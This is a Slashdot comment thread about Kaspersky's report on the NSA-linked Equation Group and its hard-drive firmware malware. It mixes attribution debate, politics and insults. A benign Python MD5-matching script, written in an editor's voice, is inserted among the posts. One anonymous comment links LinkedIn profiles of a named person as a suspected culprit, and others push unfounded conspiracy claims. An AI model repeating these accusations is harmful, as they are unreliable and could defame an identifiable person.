    Actually, I should modify my comment. The headline does say a different thing from the summary, but the actual article does in fact go on to give some reasonable evidence connecting the group to the NSA. So, "tied to NSA" is an accurate summary, although with the caveat that "tied to" are words that "stop short" of saying that it actually is the NSA.

    --
    http://www.geoffreylandis.com
26. Get that right, it's Omnipotent, not Omni-Potent. by Anonymous Coward · · Score: 0

    Remember your groups. There is only one Omni-Potent.
    ph3@r m3

27. Get that right, it's Omnipotent, not Omni-Potent. by Anonymous Coward · · Score: 0

    I'm Not Anonymous. those fricking wankers.

  28. Infected machines reporting to Equation Group? by lippydude · · Score: 1

    "infected machines reporting to Equation Group command servers identified themselves as Macs, an indication that the group successfully compromised both iOS and OS X devices."

What vectors did the malware exploit to load-and-execute on the targeted Windows, iOS and OS X devices? Please provide samples of the disassembled code.

  29. Unregistered by eric31415927 · · Score: 1

    Running MD5sum on Unregistered (with no carriage return) produces the hash 84b8026b3f5e6dcfb29e82e0b0b0f386

    The article used a lower-case u in unregistered, which produces a different hash.

    Still no luck on figuring out e6d290a03b70cfa5d4451da444bdea39
    My email address doesn't hash to it, so I guess I'm not being singled out.

    1. Re:Unregistered by Anonymous Coward · · Score: 0

      Arabic for unregistered, the article was updated.
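The candidate-hash check the commenter above is doing by hand (hash a guessed string, compare against the digest pulled from the sample, retry with case changes) generalises to a small script. The following is an added example, not code from the thread, from the article, or from Kaspersky. It assumes the two hex digests are copied correctly from the comment above; the Arabic candidate is an ordinary dictionary translation I am assuming, not a string from the article, and the script only reports a match if one of its case/encoding variants actually reproduces a digest. The encoding loop is the part worth noticing: a non-Latin word hashes to a different value under UTF-8, UTF-16LE and the legacy Windows Arabic code page, so a one-encoding guess can miss a correct word.

```python
import hashlib

# Digests quoted in the comment above (copied from the thread, not verified here).
THREAD_HASHES = [
    "84b8026b3f5e6dcfb29e82e0b0b0f386",  # claimed by the commenter to be MD5("Unregistered")
    "e6d290a03b70cfa5d4451da444bdea39",  # the digest the commenter could not identify
]

# Encodings to try: the same characters hash differently under each.
# cp1256 is the legacy Windows Arabic code page.
ENCODINGS = ("utf-8", "utf-16-le", "utf-16-be", "cp1256")


def md5_hex(text, encoding="utf-8"):
    """MD5 of `text` under one encoding, as a lowercase hex string."""
    return hashlib.md5(text.encode(encoding)).hexdigest()


def case_variants(text):
    """Exact, lower, upper and capitalised forms, de-duplicated, original first."""
    seen = []
    for v in (text, text.lower(), text.upper(), text.capitalize()):
        if v not in seen:
            seen.append(v)
    return seen


def candidate_hashes(text, encodings=ENCODINGS):
    """Map every (variant, encoding) pair of `text` to its MD5 hex digest.
    Encodings that cannot represent the text are skipped rather than failing."""
    table = {}
    for variant in case_variants(text):
        for enc in encodings:
            try:
                digest = md5_hex(variant, enc)
            except UnicodeEncodeError:
                continue
            # keep the first (variant, encoding) that produced this digest
            table.setdefault(digest, (variant, enc))
    return table


def match_hashes(candidates, targets, encodings=ENCODINGS):
    """Return {target_hash: (variant, encoding)} for every target digest that
    some candidate string reproduces under some case/encoding variant."""
    wanted = {t.lower() for t in targets}
    found = {}
    for word in candidates:
        for digest, how in candidate_hashes(word, encodings).items():
            if digest in wanted and digest not in found:
                found[digest] = how
    return found


if __name__ == "__main__":
    # Candidate words: the English one from the comment, plus an assumed
    # dictionary translation to Arabic (my guess, not a string from the article).
    candidates = ["Unregistered", "غير مسجل"]
    hits = match_hashes(candidates, THREAD_HASHES)
    for h in THREAD_HASHES:
        print(h, "->", hits.get(h, "no match among the tried variants"))
```

Run it as-is and it prints, per digest, either the (variant, encoding) that reproduced it or a no-match line; add candidates to the list to widen the search. MD5 is used here only because that is what the commenter is matching against; nothing about the check depends on the hash function.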

  30. Re:Human Nature by causality · · Score: 1

    is such that certain crimes are so grave that they transcend the realm of due process and require summary execution.

    The whole point of due process is to ensure that yes, this is indeed the guilty party to be punished. Historically, the witch hunt was one popular alternative.

    --
    It is a miracle that curiosity survives formal education. - Einstein
  31. Re:The NSA hides surveillance software in hard dri by Anonymous Coward · · Score: 0

    Why does that mean that it's NSA?

    Given that most of the electronic manufacturing is in China or Taiwan, it's fairly reasonable to think that hardware bugging could be a result of Chinese intelligence operations. If you were them, where would you concentrate efforts---where you have a comparative advantage. NSA can make use of the best spy satellites and submarine fiber operations, China would exploit manufacturing in their country of foreign goods.

    Of course there are powerful state-sponsored espionage efforts. But too many people think that's only NSA, when the list of suspects should include all big ones, i.e. China, Russia, UK, Germany, France & Israel.

  32. What a load of crap. by hackus · · Score: 0

    I highly doubt they had the resources to infiltrate all of these systems without key industry support.

    You have to be an incredible moron to think these people are brilliant, they are not.

    They have a huge checkbook and that is the only brilliance they need to get the cooperation they require from Seagate, Toshiba etc.

    They do not need the entire company to conspire, only a handful will do, from the article I would say less than 10.

    It is almost as stupid as believing Google protects your privacy because they use HTTPS on search queries.

    Brilliant my ass

    --
    Got Geometrodynamics? Awe, too hard to figure out? Too bad.
  33. Bye Bye Kaspersky by Anonymous Coward · · Score: 0

    Kaspersky is going down, and that's a very good thing for America!

  34. The application of force by Etherwalk · · Score: 1

    I think the intelligence community has done more harm than good more often than not.

    I think American foreign policy has done more harm than good to America more often than not.

Throughout history, it has been the use of power which has undermined empires, and the threat of the use of power which makes them most effective. Wars are costly and can be unpredictable; they have almost always been much more expensive than planned and almost always much less useful, except at certain very defined tasks. (Giving someone a temporary boost to poll numbers, uniting a country against a perceived threat, acting as a salve to respond to demand for war that leaders are afraid to turn down).

    There are also other risks inherent in war. You train a large number of soldiers and give them weapons and training, which means that every day, your nation is fundamentally dependent upon their loyalty to survive--sometimes to defend it, but ALWAYS to not change the government or take over the government or turn on the country.

    1. Re:The application of force by nbauman · · Score: 1

      What our intelligence services are doing is overthrowing brutal, efficient dictators who kept their country together and replacing them with brutal, inefficient armed gangs who are tearing their country apart.

Saddam Hussein had one of the best education systems, and one of the best health care systems, in the Mideast. They had a higher ratio of female college professors than we do in the US.

  35. Need more meat and potatoes by Anonymous Coward · · Score: 0

    I would have expected Slashdot to have much better commentary regarding this. Hopefully this thread just needs time to ripen.

  36. Accusations Akimbo - But No Remedies? by Anonymous Coward · · Score: 0

    Love how there's plenty of how it was done, but no real discussion on how to avoid it, detect it, or anything relevant to the millions of users that are wide fucking open to nation-state tampering.

    And you call yourselves geeks.

    I guess we all roll over and say "meh, guess I'll just recompile my kernel while the world burns".

    1. Re:Accusations Akimbo - But No Remedies? by Ash-Fox · · Score: 1

      Why would we need to discuss it when we already know how?

      I guess we all roll over and say "meh, guess I'll just recompile my kernel while the world burns".

      Precisely. If you look at all those attacks, they are targeting Windows specifically.

      --
      Change is certain; progress is not obligatory.
  37. Stupidity by ThatsNotPudding · · Score: 1

    Stupidity is defined as mere elected officials thinking they have real control of the organs of state security. It wasn't true in the Soviets, it isn't true in the US.

  38. In Other Words: COMMUNISTS by Anonymous Coward · · Score: 0

    And yeah, NSA is a bunch of communists, too.

  39. The Only Thing by Anonymous Coward · · Score: 0

    ..which will work is for China and Russia to develop their indigenous Information Technology.

Everybody else please revert to paper and Daimler-Benz's innovation. Don't forget to clip the GSM transmitter they have infested cars with these days.

    Or bend over.

  40. What Works For The Goose by Anonymous Coward · · Score: 0

    ..is also good for the Gander.

Recently an AEGIS radar in the Black Sea was put out of commission by Russkie electronic attack.

    You take out a 1MW radar by some 10W signal from 100km distance...

    Welcome to the New Insecurity !

  41. NICE LIE by Anonymous Coward · · Score: 0

Most of the stuff made in China is being developed (both HW and SW) in the U.S. or by U.S. vassals (like ARM, NXP, SG, Siemens or Checkpoint).

    So - nice try to deflect from the JCS/NSA World Domination Complex.

    1. Re:NICE LIE by Anonymous Coward · · Score: 0

      So - nice try to deflect from the JCS/NSA World Domination Complex.

      50 cent party detected.

  42. Just Imagine What Exists Now by Anonymous Coward · · Score: 0

    Just imagine what exists now, if we are allowed to learn about these particular exploits...

  43. Could this be the guy? by Anonymous Coward · · Score: 0

    https://www.linkedin.com/pub/robert-green/26/525/6a6
    https://www.linkedin.com/company/professional-solutions-llc?trk=ppro_cprof


  44. These Guys Are Fucking Geniuses by darkmeridian · · Score: 3, Interesting

    You can hate the NSA all you want, but I have to tip my cap at their utter genius.

Beyond the technical similarities to the Stuxnet and Flame developers, Equation Group boasted the type of extraordinary engineering skill people have come to expect from a spy organization sponsored by the world's wealthiest nation. One of the Equation Group's malware platforms, for instance, rewrote the hard-drive firmware of infected computers: a never-before-seen engineering marvel that worked on 12 drive categories from manufacturers including Western Digital, Maxtor, Samsung, IBM, Micron, Toshiba, and Seagate.

    The malicious firmware created a secret storage vault that survived military-grade disk wiping and reformatting, making sensitive data stolen from victims available even after reformatting the drive and reinstalling the operating system. The firmware also provided programming interfaces that other code in Equation Group's sprawling malware library could access. Once a hard drive was compromised, the infection was impossible to detect or remove.

    --
    A NYC lawyer blogs. http://www.chuangblog.com/
  45. Thank you, NSA by mtrachtenberg · · Score: 1

Thank you, National Security Agency, for doing such a truly brilliant job of damaging future prospects for the American computer hardware industry. Smart move to leave the torture to the CIA, no reason for geeks to get their hands dirty. You, along with the CIA, daily provide the rest of the world with evidence of how deeply, incredibly stupid supposedly smart people can be when they don't mix with grown-ups. Congratulations!

  46. Wrong by Anonymous Coward · · Score: 0

    The right question is,

    How much cash, drugs, African prostitutes did Seagate and Western Digital and their "contractors" squeeze out of the USA for access to their drives while in production ?

    It is no matter at all that NSA did it.

    The question is MONEY (cash, drugs, prostitute slaves) to Seagate and Western Digital and their Contractor CEO's.

  47. Kaspersky and friends by Anonymous Coward · · Score: 0

    Well done Kaspersky ! Even more so if the KGB or MVD (or RGN or VMG) lent a helping hand in this whole post-hollywoodian scenario of uncovering the malfeasances of the US. Why not ? You anglo-saxons and western europeans are not so naive, I hope, to think that there isn't a CCCP-NSA ?!

  48. They must deliver it 1st by Anonymous Coward · · Score: 0

This intercepts it before they can http://start64.com/index.php?o... & same with any known virus/spyware/trojan/malware maker, botnet herder, spammer/phisher, tracker, etc. - et al! See, the funniest part is, they HAVE to be exposed to work (only specifically targeted ones aren't) & thus, they are ALL exposed, shortly.

    * That's part of what it does for security...

    (Rest is more reliability vs. DNS issues, & more speed - only security solution I know of that offers it 2 ways (hardcoded locally resolved favorite sites where you spend most of your time online which also aids reliability, AND, blocking adbanners which steal your money in what you paid out monthly to be online...))

    Between hosts & your firewall (both native to your OS & operating in kernelmode)? That's the best defense you already have!

    Literally a forcefield or logical diode/safety valve of sorts that really works for better speed, security, reliability (& even anonymity to an extent) just by using what you already have with updating/patching OS + Apps.

    You can't get sick if you're unable to be exposed (online @ least, the usual delivery mechanism), after all.

    APK

    P.S.=> By "yours truly": ACCEPT no substitutes (Porsche... from Risky Business, & Tom Cruise (a fellow syracusan)) - it just works - in both True 64-bit &/or 32-bit native code written with the native NT API, Win32/64 API, + highly optimized by hand & compiler Borland Delphi XE4 Object Pascal code... apk